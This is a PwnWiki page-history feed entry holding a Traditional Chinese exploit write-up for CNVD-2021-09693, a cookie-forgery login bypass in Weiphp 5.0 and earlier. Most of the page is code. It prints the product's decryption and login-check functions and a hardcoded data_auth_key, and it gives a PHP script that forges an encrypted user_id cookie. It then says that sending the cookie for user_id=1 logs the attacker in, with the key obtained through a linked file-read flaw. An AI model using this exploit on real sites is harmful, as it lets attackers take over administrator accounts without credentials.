https://pwnwiki.com/index.php?action=history&feed=atom&title=CNVD-2021-09693_Weiphp5.0_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6Cookie%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E%2Fzh-hant
CNVD-2021-09693 Weiphp5.0 任意用戶Cookie偽造漏洞/zh-hant - Revision history
2026-04-07T20:55:52Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CNVD-2021-09693_Weiphp5.0_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6Cookie%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E/zh-hant&diff=3461&oldid=prev
Pwnwiki: Created page with "首先需要得到數據庫配置文件中的<code>data_auth_key</code>密鑰"
2021-05-26T13:28:44Z
<p>Created page with "首先需要得到數據庫配置文件中的<code>data_auth_key</code>密鑰"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==漏洞影響==<br />
<pre><br />
Weiphp <= 5.0<br />
</pre><br />
<br />
<br />
==漏洞利用==<br />
<br />
首先需要得到數據庫配置文件中的<code>data_auth_key</code>密鑰<br />
<br />
[[File:Weiphp-15.png |800px]]<br />
<br />
得到這個配置文件可參考 [https://www.pwnwiki.org/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞]<br />
<br />
<br />
<pre><br />
'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'<br />
</pre><br />
<br />
<br />
全局查找使用了這個密鑰的地方:<br />
<br />
[[File:Weiphp-16.png |800px]]<br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
找到了跟據這個密鑰的加密方法和解密方法<br />
</div><br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
加密方法 <code>think_encrypt</code><br />
</div><br />
<br />
<pre><br />
<br />
function think_encrypt($data, $key = '', $expire = 0)<br />
{<br />
$key = md5(empty($key) ? config('database.data_auth_key') : $key);<br />
<br />
$data = base64_encode($data);<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
$str = sprintf('%010d', $expire ? $expire + time() : 0);<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);<br />
}<br />
return str_replace(array(<br />
'+',<br />
'/',<br />
'='<br />
), array(<br />
'-',<br />
'_',<br />
''<br />
), base64_encode($str));<br />
}<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
解密方法 <code>think_decrypt</code><br />
</div><br />
<br />
<pre><br />
function think_decrypt($data, $key = '')<br />
{<br />
$key = md5(empty($key) ? config('database.data_auth_key') : $key);<br />
$data = str_replace(array(<br />
'-',<br />
'_'<br />
), array(<br />
'+',<br />
'/'<br />
), $data);<br />
$mod4 = strlen($data) % 4;<br />
if ($mod4) {<br />
$data .= substr('====', $mod4);<br />
}<br />
$data = base64_decode($data);<br />
$expire = substr($data, 0, 10);<br />
$data = substr($data, 10);<br />
<br />
if ($expire > 0 && $expire < time()) {<br />
return '';<br />
}<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = $str = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) {<br />
$str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));<br />
} else {<br />
$str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));<br />
}<br />
}<br />
return base64_decode($str);<br />
}<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
在文件 <code>application\common.php</code> 中含有使用解密方法的代碼,用於做身份驗證<br />
</div><br />
<br />
<pre><br />
function is_login()<br />
{<br />
$user = session('user_auth');<br />
if (empty($user)) {<br />
$cookie_uid = cookie('user_id');<br />
if (!empty($cookie_uid)) {<br />
$uid = think_decrypt($cookie_uid);<br />
$userinfo = getUserInfo($uid);<br />
D('common/User')->autoLogin($userinfo);<br />
<br />
$user = session('user_auth');<br />
}<br />
}<br />
if (empty($user)) {<br />
return 0;<br />
} else {<br />
return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0;<br />
}<br />
}<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
根據這裡得到的代碼,可以知道當user_Id=1時,會解密密鑰後判斷是否正確,如果正確則可以登錄系統<br />
</div><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
我們在本地使用加密代碼加密user_id=1得到的cookie則可以登錄系統<br />
</div><br />
<br />
<pre><br />
<?php<br />
show_source(__FILE__);<br />
function think_encrypt($data, $key = '', $expire = 0)<br />
{<br />
$key = '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T';<br />
$key = md5($key);<br />
<br />
$data = base64_encode($data);<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
$str = sprintf('%010d', $expire ? $expire + time() : 0);<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);<br />
}<br />
return str_replace(array(<br />
'+',<br />
'/',<br />
'='<br />
), array(<br />
'-',<br />
'_',<br />
''<br />
), base64_encode($str));<br />
}<br />
<br />
echo 'user_id = ' . think_encrypt($_GET['user_id']);<br />
?><br />
</pre><br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
添加<code>cookie: user_id=xxxxxxxx</code>即可成功登錄<br />
</div><br />
<br />
[[File:Weiphp-18.png |800px]]<br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==參考==<br />
</div><br />
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.html</div>
Pwnwiki